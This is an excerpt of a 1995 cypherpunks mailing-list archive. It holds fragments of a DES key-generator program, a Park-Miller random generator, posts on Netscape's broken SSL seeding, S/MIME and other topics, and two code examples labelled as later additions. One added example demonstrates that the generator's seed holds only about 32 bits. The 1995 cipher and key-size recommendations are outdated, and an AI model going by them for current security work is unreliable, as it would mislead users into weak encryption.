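  /* calculate secret key from file; calcsecretkey() adds the file's
     bytes into key, so start from a zeroed block */
  DES_ZERO_CBLOCK(key);
  calcsecretkey(keyfile, &key);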

  /* show secret key, if verbose mode */
  if (vflag) {
    fprintf(stderr, "secret key: ");
    printcblock(stderr, &key);
    fprintf(stderr, "\n");
  }

  /* init the DES random-generator */
  des_init_random_number_generator(&key);

  /* remove traces of secret key */
  DES_ZERO_CBLOCK(key);

  /* generate output */
  for(l=0; l < keylen; l++) {
    des_random_cblock(&out);
    printcblock(stdout, &out);
    DES_ZERO_CBLOCK(out);
  }
  printf("\n");

  return(0);
}


----- ZZ: rand.c -----
/*
 * This program is public domain and was written by William S. England
 * (Oct 1988).  It is based on an article by:
 *
 * Stephen K. Park and Keith W. Miller. RANDOM NUMBER GENERATORS:
 * GOOD ONES ARE HARD TO FIND. Communications of the ACM,
 * New York, NY.,October 1988 p.1192

   From: wengland@stephsf.com (Bill England)
   Newsgroups: alt.sources,comp.lang.c,rec.games.programmer,comp.os.msdos.programmer
   Subject: Re: random number generator (random.c)
   Date: 5 Jan 92 20:12:08 GMT
   Organization: Stephen Software Systems Inc., Tacoma/Seattle, +1 800 829 1684

Modifications;

   Sun Feb 10 18:20:38 PST 1991
    WSE, modified for replacement of random number object file
    under unix and for use with Perl.

 The following is a portable c program for generating random numbers.
 The modulus and multiplier have been extensively tested and should
 not be changed except by someone who is a professional Lehmer generator
 writer.  THIS GENERATOR REPRESENTS THE MINIMUM STANDARD AGAINST WHICH
 OTHER GENERATORS SHOULD BE JUDGED. ("Quote from the referenced article's
 authors. WSE" )
*/

#include <stdio.h> 

#define	m  (unsigned long)2147483647
#define	q  (unsigned long)127773

#define	a (unsigned int)16807
#define	r (unsigned int)2836

/*
** F(z)	= (az)%m
**	= az-m(az/m)
**
** F(z)  = G(z)+mT(z)
** G(z)  = a(z%q)- r(z/q)
** T(z)  = (z/q) - (az/m)
**
** F(z)  = a(z%q)- rz/q+ m((z/q) - a(z/m))
** 	 = a(z%q)- rz/q+ m(z/q) - az
*/

/*
**
*/
unsigned long seed;

void goodsrand( /* unsigned long*/ initial_seed)
unsigned long initial_seed;
{
    seed = initial_seed; 
}
/*
**
*/
unsigned long goodrand(/*void*/){

register
int 	lo, hi, test;

    hi   = seed/q;
    lo   = seed%q;

    test = a*lo - r*hi;

    if (test > 0)
	seed = test;
    else
	seed = test+ m;

    return seed;
}

#ifdef TEST1
/*  
**   The result of running this program should be
**   1043618065.  If this program does not yield this
**   value then your compiler has not implemented this
**   program correctly.
*/

main(/*void*/)
{
unsigned 
long	n_rand;

register int 	i;
int	success = 0;

    goodsrand(1);

    for( i = 1; i <= 10001; i++){
        n_rand = goodrand();

        if( i> 9998)  
	    printf("Sequence %5i, Seed= %10i\n", i, seed ); 

	if( i == 10000) 
	    if( seed == 1043618065 ) 
		success = 1;
    }

    if (success){
	printf("The random number generator works correctly.\n\n");
	exit(0);
    }else{
	printf("The random number generator DOES NOT WORK!\n\n");
	exit(1);
    }
}
#endif
/*
-- 
 +-  Bill England,  wengland@stephsf.COM -----------------------------------+
 |   * *      H -> He +24Mev                                                |
 |  * * * ... Oooo, we're having so much fun making itty bitty suns *       |
 |__ * * ___________________________________________________________________| 
*/


---- ZZ: Makefile ----

#
# Makefile for asadi.
#

CC=gcc
CFLAGS=-g
LIBS=-lkrb -ldes

asadi: asadi.c rand.o
	${CC} ${CFLAGS} -o asadi asadi.c rand.o ${LIBS}

rand.o: rand.c
	$(CC) -c rand.c
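
The gensecret() comment asks whether the approach has a weakness. The following added example (not part of the original post or of the asadi sources) works through the size of its search space. It assumes a 32-bit unsigned long, as on 32-bit Unix systems of the time; the struct, the function names and the sample input values are constructed for illustration, and os_secret() shows the kernel's generator as the replacement source.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Same multiplier and modulus as rand.c above (Park-Miller minimal
   standard), computed with 64-bit arithmetic instead of Schrage's method. */
#define PM_A 16807ULL
#define PM_M 2147483647ULL            /* 2^31 - 1 */

static uint32_t pm_state;

static void pm_seed(uint32_t s) { pm_state = s; }

static uint32_t pm_next(void) {
    pm_state = (uint32_t)((PM_A * pm_state) % PM_M);
    return pm_state;
}

/* The values gensecret() mixes into its seed. ASSUMPTION: unsigned long is
   32 bits, so each field is modelled as a uint32_t. */
struct inputs {
    uint32_t tv_sec, tv_usec, elapsed_usec, pid, hostid;
    const char *typed;
};

/* Fold the typed text as gensecret() does: pack each complete 4-byte group
   into a word and XOR the words together (trailing bytes are ignored). */
static uint32_t fold_text(const char *c) {
    uint32_t u = 0;
    size_t groups = strlen(c) / 4;
    for (size_t j = 0; j < groups; j++) {
        uint32_t v = 0;
        for (size_t i = 0; i < 4; i++)
            v = (v << 8) + (unsigned char)c[4 * j + i];
        u ^= v;
    }
    return u;
}

/* Every input is XORed into one word, so the seed holds at most 32 bits
   no matter how many sources feed it. */
static uint32_t mix_seed(const struct inputs *in) {
    return in->tv_usec ^ in->tv_sec ^ in->elapsed_usec ^ in->pid
         ^ in->hostid ^ fold_text(in->typed);
}

/* gensecret()'s output loop: discard ta values, then write 8 words,
   discarding b values after each one. */
static void derive_secret(uint32_t seed, int ta, int b, uint32_t out[8]) {
    pm_seed(seed);
    for (int i = 0; i < ta; i++) (void)pm_next();
    for (int i = 0; i < 8; i++) {
        out[i] = pm_next();
        for (int j = 0; j < b; j++) (void)pm_next();
    }
}

/* Upper bound, in bits, on the number of distinct secret files. The file is
   fixed by the generator state at the first output (fewer than 2^31 values)
   and the step factor; the throw-away count only moves the starting point
   along the generator's cycle and adds nothing. */
static int secret_bits_upper_bound(unsigned b_choices) {
    int bits = 31;
    while (b_choices > 1) { bits++; b_choices = (b_choices + 1) / 2; }
    return bits;
}

/* Replacement source: take the 8 key bytes from the kernel's generator.
   Returns 0 on success, -1 if /dev/urandom is unavailable. */
static int os_secret(unsigned char key[8]) {
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f) return -1;
    size_t n = fread(key, 1, 8, f);
    fclose(f);
    return n == 8 ? 0 : -1;
}

int main(void) {
    /* Constructed sample inputs. */
    struct inputs a = {811434657u, 123456u, 900000u, 4242u, 0x80f3a1c2u, "AAAABBBB"};
    struct inputs b = a;              /* different inputs, same XOR */
    b.pid = a.hostid; b.hostid = a.pid; b.typed = "BBBBAAAA";
    uint32_t sa[8], sb[8];
    unsigned char key[8];

    derive_secret(mix_seed(&a), 7, 3, sa);
    derive_secret(mix_seed(&b), 7, 3, sb);
    printf("different inputs, same secret: %s\n",
           memcmp(sa, sb, sizeof sa) == 0 ? "yes" : "no");
    printf("upper bound with 100 step-factor choices: %d bits\n",
           secret_bits_upper_bound(100));
    printf("os_secret: %s\n", os_secret(key) == 0 ? "ok" : "unavailable");
    return 0;
}
```

The bound is far below the 56 bits of the DES key that calcsecretkey() later folds the file into, so the secret file is the weakest link in the chain.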




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danjw@earthlink.net (Dan Weinstein)
Date: Mon, 18 Sep 95 00:27:34 PDT
To: cypherpunks@toad.com
Subject: Netscape Navigator 2.0 will implement secure e-mail
Message-ID: <199509180727.AAA23196@atlas.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


I just got off of Netscape's home page and they have announced Netscape
Navigator 2.0. It will include full e-mail functionality with S/MIME
implemented.  Does anybody know anything about the S/MIME Protocol?
How secure is it?



Dan Weinstein
danjw@earthlink.net
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 18 Sep 95 04:31:19 PDT
To: www-buyinfo@allegra.att.com
Subject: e$: New Ecash Shop
Message-ID: <v02120d03ac83084712cc@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



Now, this looks interesting...

Cheers,
Bob Hettinga

--- begin forwarded text

From: kulz@dragon.klte.hu (Kultsar Zoltan)
Subject: New Ecash Shop
To: rah@shipwright.com
Date: Mon, 18 Sep 1995 12:30:19 +0200 (MET DST)
MIME-Version: 1.0


  I have opened a new unofficial shop, that accepts ecash.
It's unofficial, because it has not yet a logo.
It is an autoresponder, which automatically sends out documents
that people request. Uploading costs 5 USD or 15 cb$s (minimum
charges). Your documents will also be available on www, or you
can build your homepage if you wish, but I can provide only slow
links yet. I bought the original autoresponder for ecash, but it in
its original form wasn't secure. Eg. 'send *' type requests sent
out private material. Now it's completely secure.

   Send mail

        To: kulz@dragon.klte.hu
        Subject: send faxbank

There is also a www page at

        http://dragon.klte.hu/~kulz/faxbank.html,

where you can view the documents online.
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 18 Sep 95 07:54:40 PDT
To: cwe@it.kth.se>
Subject: Re: Netscape SSL implementation is broken!
Message-ID: <ac83454201021004a29a@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:29 PM 9/17/95, Perry E. Metzger wrote:
>Christian Wettergren writes:
>> I guess we should send them the draft-ietf-security-randomness-00.txt
>> asap.
>
>I thought that was an RFC by now.
>
>Perry
It is! RFC 1750.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 18 Sep 95 01:35:16 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <199509180727.AAA23196@atlas.earthlink.net>
Message-ID: <43jau5$qbj@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509180727.AAA23196@atlas.earthlink.net>, danjw@earthlink.net (Dan Weinstein) writes:
> I just got off of Netscape's home page and they have announced Netscape
> Navigator 2.0. It will include full e-mail functionality with S/MIME
> implemented.  Does anybody know anything about the S/MIME Protocol?
> How secure is it?

  You can find some documents about s/mime on RSA's web site:

	http://www.rsa.com/ftpdir/pub/S-MIME/

S/MIME is basically a mime body enveloped in a PKCS7 message.  You can
find out more about PKCS from:

	http://www.rsa.com/ftpdir/pub/pkcs

The implementation guide recommends using rc2-cbc 40-bit for content
encryption when there is no way to determine the capabilities of the
recipient.  When you do know what the recipient can do, it recommends
using RC2-CBC with a longer key or DES-CBC.

For key encryption, support for RSA with key sizes of 512 to 1024 is
required, and support for 2048 bit keys is recommended.  A minimum
key size of 768 bits is recommended for US users.

> Dan Weinstein

  Hi Dan.  Yes, we are related.  :-)

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Mon, 18 Sep 95 06:56:53 PDT
To: Steve Bryan <sbryan@maroon.tc.umn.edu>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <v02130501ac814d566452@[204.221.10.130]>
Message-ID: <Pine.3.89.9509180959.B28455-0100000@echonyc>
MIME-Version: 1.0
Content-Type: text/plain


No chance. The problem for me isn't that someone wanted to call a movie 
Hackers but that it causes confusion in that for eleven years there has 
been a preexisting work by that name.  There is a novelization of the 
screenplay now in paperback, so if a friend recommends that you buy 
Hackers, you'll probably buy that one. (especially since Dell is 
determined to do as little as possible for my own book). 

On Sun, 17 Sep 1995, Steve Bryan wrote:

> At 8:36 pm 9/16/95, Steven Levy wrote:
> 
> >>I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >>very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >>is curiosity." 
> >
> >It may not be a crime, but it's not nice to steal a title.
> 
> I suppose this means that when "Hackers" comes out on video there's no point in looking for a cameo appearance of the author of the identically named book?
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 18 Sep 95 09:58:40 PDT
To: perry@piermont.com
Subject: Re: Netscape SSL implementation cracked!
In-Reply-To: <199509180527.BAA28782@frankenstein.piermont.com>
Message-ID: <199509181652.JAA23706@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Anyway, congratulations to you and Dave on an excellent piece of
> work. I say a bunch of us should buy you "I broke Netscape's security
> and all I got was this lousy T-Shirt" shirts, if only someone would
> design them!
> 

	If someone would design them (i'll see if my graphic designer
is up to the task, but he's on vacation right now), Community
ConneXion will make/fund them. 

-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Mon, 18 Sep 95 07:12:45 PDT
To: <cypherpunks@toad.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <9509181412.AA15673@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> >I saw "Hackers" yesterday. It's not bad and its political sensibility is
> >very cyberpunk. The ad campaign even uses the tag line, "Their only crime
> >is curiosity." 

> It may not be a crime, but it's not nice to steal a title.

You mean, like you stole it from Dale Luck's (duck@mit oz) stage play of the same name?
I saw this (in an Off-Off-Broadway production), years before your book came
out.




Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 18 Sep 95 07:21:55 PDT
To: Charles Lewton <clewton@netcom.com>
Subject: Re: Linking = Showing = Transferring?
Message-ID: <199509181421.KAA01808@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:33 AM 9/15/95 -0700, Charles Lewton wrote:

>Not quite squashed, Duncan.  Bullet placement (poor by some standards)
>is all that prevented Mr. Weaver from croaking like his unfortunate wife.
>She is said to have "pissed off" the feds but was not charged with a
>single actionable item yet she remains quite dead.
>
>Unless I have missed something somewhere, no TLA is concerned in the slightest
>with individual liberty.  That notion should keep a rational person awake
>nights.
>
>Chuck
>

In response to Chuck and Lucky, I can only say that the Weavers suffered 57%
casualties (4/7) and 28% KIA (2/7).  The Feds suffered .25% KIA (1/400).  I
don't think any Feds were merely wounded.

They brought murder charges against two members of the group and lost.  They
settled wrongful death suits for $3.1 million.  They also lost the publicity
war.  They had to change their procedures because of Ruby Ridge and Waco.
They energized the opposition.

The casualties were unfortunate but when facing force ratios of 57/1 or
better, the outcome has to be considered a major victory for Randy Weaver.
The case is a demonstration of modern conflicts in which litigation and
publicity count as much as guns.  On that field, the Feds don't hold all the
cards.

DCF

"The libertarian and conservative coalition of the 'Right' is a
low-maintenance coalition because its members mostly want to be left alone
while the special interest group coalition of the 'Left' is a
high-maintenance coalition because all of its members need to be given a
vast dose of government cash daily."   






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 18 Sep 95 07:23:07 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Anonymous WWW proxy Alpha release available
Message-ID: <199509181421.KAA01875@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks.  What we now need is a proxy located in the US with good connections
for performance.  Does anyone know a good test page that reads back the info
your browser is putting out so you can test proxies?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 18 Sep 95 07:27:17 PDT
To: trei@process.com
Subject: Re: "Hackers"-- brief review and anecdote...
Message-ID: <199509181426.KAA03412@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 AM 9/18/95 -6, Peter Trei wrote:

>> It may not be a crime, but it's not nice to steal a title.
>
>You mean, like you stole it from Dale Luck's (duck@mit oz) stage play of
the same name?
>I saw this (in an Off-Off-Broadway production), years before your book came
>out.


Steven knows titles can't be copyrighted.  He was just expressing the wish
that they had come up with their own title.  I'm pissed because the sequel
to Jurassic Park is stealing the title of Sir Arthur Conan Doyle's dinosaur
novel "Lost World."  Unfortunately, title-space is more limited than book-space.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 18 Sep 95 03:41:42 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape Navigator 2.0 will implement secure e-mail
In-Reply-To: <43jau5$qbj@tera.mcom.com>
Message-ID: <43jibb$5ok@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SOL.3.91.950918185301.29263B-100000@orb>, eay@mincom.oz.au (Eric Young) writes:
> Hmm....  notice the use of a non public cipher as the base cipher.... 
> what a shame.... 

  The only reason for this is US export laws.

> It will be shipping with examples of des-ecb, des-cfb, des-cbc, des-ede2, 
> des-ede3, idea-ecb, idea-cfb, idea-cbc and rc4-128.  If people could send 
> me the official Object identifiers for these ciphers, I'll be able to 
> support them in PKCS-7, otherwise they will only be supported in PEM mode.

  Here are the ones I have:

     DES-ECB OBJECT IDENTIFIER ::= { algorithm 6 } 
     DES-CBC OBJECT IDENTIFIER ::= { algorithm 7 } 
     DES-OFB OBJECT IDENTIFIER ::= { algorithm 8 } 
     DES-CFB OBJECT IDENTIFIER ::= { algorithm 9 } 
     DES-MAC OBJECT IDENTIFIER ::= { algorithm 10 } 
     DES-EDE OBJECT IDENTIFIER ::= { algorithm 17 }

     where 

     algorithm OBJECT IDENTIFIER ::=  
       {iso(1) identified-organization(3) oiw(14) secsig(3) algorithm(2)}


	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
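
Added example, not part of the message above and not Netscape or SSLeay code: the OIDs Jeff lists, expanded from the `algorithm` base arc and DER-encoded as they would appear inside a PKCS #7 AlgorithmIdentifier. The function names are assumptions of this sketch; the arc numbers are exactly those quoted in the message.

```python
# Base arc quoted in the message:
# {iso(1) identified-organization(3) oiw(14) secsig(3) algorithm(2)}
OIW_SECSIG_ALGORITHM = (1, 3, 14, 3, 2)

# Final arcs exactly as listed in the message.
DES_ARCS = {
    "DES-ECB": 6, "DES-CBC": 7, "DES-OFB": 8,
    "DES-CFB": 9, "DES-MAC": 10, "DES-EDE": 17,
}


def _base128(value):
    """Encode one arc in base 128, high bit set on every octet but the last."""
    if value < 0:
        raise ValueError("OID arcs are non-negative")
    out = [value & 0x7F]
    value >>= 7
    while value:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    return bytes(reversed(out))


def _der_length(n):
    """DER definite length: short form below 128, minimal long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def encode_oid(arcs):
    """Return the DER encoding (tag 0x06) of an OID given as a tuple of arcs."""
    if len(arcs) < 2:
        raise ValueError("an OID needs at least two arcs")
    first, second = arcs[0], arcs[1]
    if first not in (0, 1, 2) or (first < 2 and second > 39):
        raise ValueError("invalid leading arcs")
    # The first two arcs share one sub-identifier: 40 * first + second.
    body = _base128(40 * first + second)
    body += b"".join(_base128(a) for a in arcs[2:])
    return b"\x06" + _der_length(len(body)) + body


def decode_oid(der):
    """Strict DER decode: rejects wrong tag, bad length, padded or cut-off arcs."""
    if len(der) < 2 or der[0] != 0x06:
        raise ValueError("not a DER OBJECT IDENTIFIER")
    length, offset = der[1], 2
    if length & 0x80:
        n = length & 0x7F
        if n == 0 or len(der) < 2 + n or der[2] == 0:
            raise ValueError("bad long-form length")
        length = int.from_bytes(der[2:2 + n], "big")
        offset = 2 + n
        if length < 0x80:
            raise ValueError("non-minimal length")
    body = der[offset:]
    if length == 0 or len(body) != length:
        raise ValueError("length does not match content")
    subids, value, in_arc = [], 0, False
    for octet in body:
        if not in_arc and octet == 0x80:
            raise ValueError("arc has a leading zero octet (not DER)")
        in_arc = True
        value = (value << 7) | (octet & 0x7F)
        if not octet & 0x80:
            subids.append(value)
            value, in_arc = 0, False
    if in_arc:
        raise ValueError("truncated arc")
    first = min(subids[0] // 40, 2)
    return (first, subids[0] - 40 * first) + tuple(subids[1:])


def dotted(name):
    """Dotted-decimal form of one of the OIDs listed in the message."""
    return ".".join(str(a) for a in OIW_SECSIG_ALGORITHM + (DES_ARCS[name],))


def der_table():
    """Map DER bytes -> cipher name, as a PKCS #7 parser would look them up."""
    return {encode_oid(OIW_SECSIG_ALGORITHM + (arc,)): name
            for name, arc in DES_ARCS.items()}


def identify(der):
    """Return the cipher name for an encoded OID, or None if it is not listed."""
    decode_oid(der)  # validates the encoding before the lookup
    return der_table().get(bytes(der))


if __name__ == "__main__":
    for name in DES_ARCS:
        der = encode_oid(OIW_SECSIG_ALGORITHM + (DES_ARCS[name],))
        print(f"{name:8} {dotted(name):14} {der.hex()}")
```

Comparing the encoded bytes after a strict decode, rather than pattern-matching raw octets, keeps a padded or truncated identifier from being accepted as a known cipher.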




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Mon, 18 Sep 95 10:48:58 PDT
To: cypherpunks@toad.com
Subject: Re: ftp://www.brooks.af.mil/pub/unix/utils/des.tar
In-Reply-To: <9509181711.AA15476@sulphur.osf.org>
Message-ID: <199509181748.KAA17616@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Rich Salz <rsalz@osf.org> writes:
> 
> This seems to be
> /* Sofware DES functions
> * written 12 Dec 1986 by Phil Karn, KA9Q; large sections adapted from
> * the 1977 public-domain program by Jim Gillogly
> * Modified for additional speed - 6 December 1988 Phil Karn
> * Modified for parameterized key schedules - Jan 1991 Phil Karn

> Would someone from outside the US try to download the above file?
> It would be, at least, amusing if an Air Force site were in violation
> of the ITAR (their README notwithstanding).

Hurm -- if Phil Karn and I knowingly allow it to remain there, that puts
us in the same position as Phil Zimmermann, right?  Oh -- except that our
offenses may already be beyond the statute of limitations.

	Jim Gillogly
	Trewesday, 27 Halimath S.R. 1995, 17:48




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Mon, 18 Sep 95 10:56:50 PDT
To: gnu@toad.com
Subject: Re:  Intellectual Property and Crypto collision
Message-ID: <9509181801.AA06230@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>> ELECTRONIC MEDIA PROTECTED UNDER COPYRIGHT LAW
>> A presidential task force has recommended that electronic transmission of
>> books, magazine articles and software should be classified as copies
>> subject to existing copyright laws.   The task force also recommended that
>> it should be illegal to make or distribute products aimed at decoding
>> encrypted software without the consent of the copyright owner. 
 
>Would this make it illegal to produce tools for decrypting key-escrowed
>software?   :-)


More importantly, would this firmly extend first amendment protection to 
electronically transmitted forms?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Mon, 18 Sep 95 08:10:04 PDT
To: cypherpunks@toad.com
Subject: Good random seeds
Message-ID: <199509181510.LAA01802@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	Since we can all see how badly time works, I'd like to point out
that Will Price, author of the excellent Cryptdisk utility for the Mac,
uses mouse movements to seed his PRNG.

	His code is available for a small fee, and I'd strongly suggest
that people who need good, easy PRNs take a look at it, and also take a
long look at RFC1750, randomness recommendations for security (or
something like that.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 18 Sep 95 11:23:52 PDT
To: norm@netcom.com (Norman Hardy)
Subject: Re: Netscape SSL implementation is broken!
In-Reply-To: <ac83454201021004a29a@DialupEudora>
Message-ID: <199509181823.LAA00950@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| At 9:29 PM 9/17/95, Perry E. Metzger wrote:
| >Christian Wettergren writes:
| >> I guess we should send them the draft-ietf-security-randomness-00.txt
| >> asap.
| >
| >I thought that was an RFC by now.
| >
| >Perry
| It is! RFC 1750.

I should have known, since it was a draft years ago. 
Ok, you Netscape people, go read RFC 1750! :-)

Btw, I guess my asadi program is full of holes and bugs.
Where is a decent 'randomness generator' for a SunOS system?

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Mon, 18 Sep 95 08:35:49 PDT
To: cypherpunks@toad.com
Subject: Re: Code of Law
In-Reply-To: <199509181425.HAA13003@infinity.c2.org>
Message-ID: <9509181534.AA10941@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Another
>court offered $1 million bounties for the arrest of local
>officials and threatened to hang them. Garfield County
>Attorney Nick Murnion charged some members of the Common
>Law court with "criminal syndicalism," alleging that the
>group had advocated acts of violence for political
>purposes. One court member was sentenced to 10 years in
>prison. Others received smaller sentences.

This sort of thing can become very dangerous very quickly. In the
UK there was a publicity seeking shyster who decided to make a
political career out of attacking a book he didn't like. The
authorities didn't want to risk getting involved so they let the
guy go round calling for the author to be murdered. He has been in
hiding since the Ayatollah issued a death threat.


>"The basic idea behind the movement," says
>University of Oregon history professor Richard Brown, "is
>'popular sovereignty,' that people are above the law.
>These people are alienated from the legal system. To some
>extent it sounds like they're also trying to settle
>personal scores."

Sounds like they don't like the democracy so they are setting
up their own lynch law. It doesn't sound all that different from
fascism. First they start saying that a group of people are evil, 
once they have convinced each other that this is the case they take
the logical next step of murdering them.


Another reason why we need cryptography, to protect ourselves against 
such self appointed lynch mobs.


		Phill H-B





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 18 Sep 95 11:37:55 PDT
To: hallam@w3.org
Subject: Re: Code of Law
In-Reply-To: <9509181534.AA10941@zorch.w3.org>
Message-ID: <199509181837.LAA01709@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| >"The basic idea behind the movement," says
| >University of Oregon history professor Richard Brown, "is
| >'popular sovereignty,' that people are above the law.
| >These people are alienated from the legal system. To some
| >extent it sounds like they're also trying to settle
| >personal scores."

I suddenly got very cold.

I think the world has seen enough of 'revolutionary justice',
both in the Soviet Union; there are some fascinating passages
of Lenin about avoiding the bourgeois invented 'justice' concept, 
and that the revolution was well 'above' that whole thing,

and in Germany.

And I guess in current China.

When the people and the governing establishment have lost contact
this much, you're in for trouble.

(Ok, remember I'm a dumb Swede, that still happens to believe that
State and People don't have to be enemies. And I do believe in a
sensible dialog between different interest groups etc etc. Flame
away, I'm just dumb anyway. ;-))

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@eskimo.com>
Date: Mon, 18 Sep 95 12:11:50 PDT
To: Steven Levy <steven@echonyc.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <Pine.3.89.9509181245.A28856-0100000@echonyc>
Message-ID: <Pine.SUN.3.91.950918120303.24314B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Sep 1995, Steven Levy wrote:

> It's my impression that the play was staged a few years after my book 
> came out in 1984 (though I chose the title in 1982). I remember reading 
> the reviews then, and they didn't 
> seem to mention that it was a revival of a years-old play whose name I had 
> unintentionally used for my own book. (Unlike the case for the current 
> movie, whose screenwriter seemed to know of my own book.)  If 
> you have evidence that the play was indeed produced before 1984, please 
> let me know.  Otherwise, I'd be happy to accept your apology, Peter.

  Guys, I think this has gotten a little silly. Trying to claim that 
anyone 'stole' a single word title is equivalent to Microsoft trying to 
tell other OS makers that they can't call their graphical frame things 
'windows' because they thought of it first.

  The word 'Hackers' is a description of a group of people. It means 
different things to different folks (personally I like the 
definition/descriptions in Steven's book) but since it is so widely used 
I don't see how anyone can claim to have had it stolen from them.

  Just as a side note, Steven's book 'Hackers' had a substantial 
influence on me when I read it, and it holds an honored place among my 
collections of books.

  Brian
------------------------------------------------------------------------------
 ftp.eskimo.com/blane     |                       |     www.eskimo.com/~blane
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Mon, 18 Sep 95 09:23:10 PDT
To: cypherpunks@toad.com
Subject: Netscape's random numbers
Message-ID: <9509181622.AA15284@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Congrats, nice job!

The Netscape license explicitly prohibits decompiling (except where such
prohibition is illegal).  When this hits the media it will be important
to avoid being tarred with the "hacker breaks rules and breaks in" brush.
More subtly, it's probably a bad idea to call into question the overall
business model of client binaries on the net.

Instead, emphasize importance of open code, public reviews, ability to
link in your own code that meets public specs, etc.  All of these things
the Internet was designed to do, and U.S. ITAR regulations are designed
to prohibit (globally, anyway).  And also that the bad guys will never
play by the rules.  And re-emphasize that solutions are possible, just
that the U.S. government prevents them from being deployed in a global
economy.

Perhaps draw parallels to the recent Microsoft Word virus.

	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Levy <steven@echonyc.com>
Date: Mon, 18 Sep 95 09:29:15 PDT
To: Peter Trei <trei@process.com>
Subject: Re: "Hackers"-- brief review and anecdote...
In-Reply-To: <199509181408.KAA02406@echonyc.com>
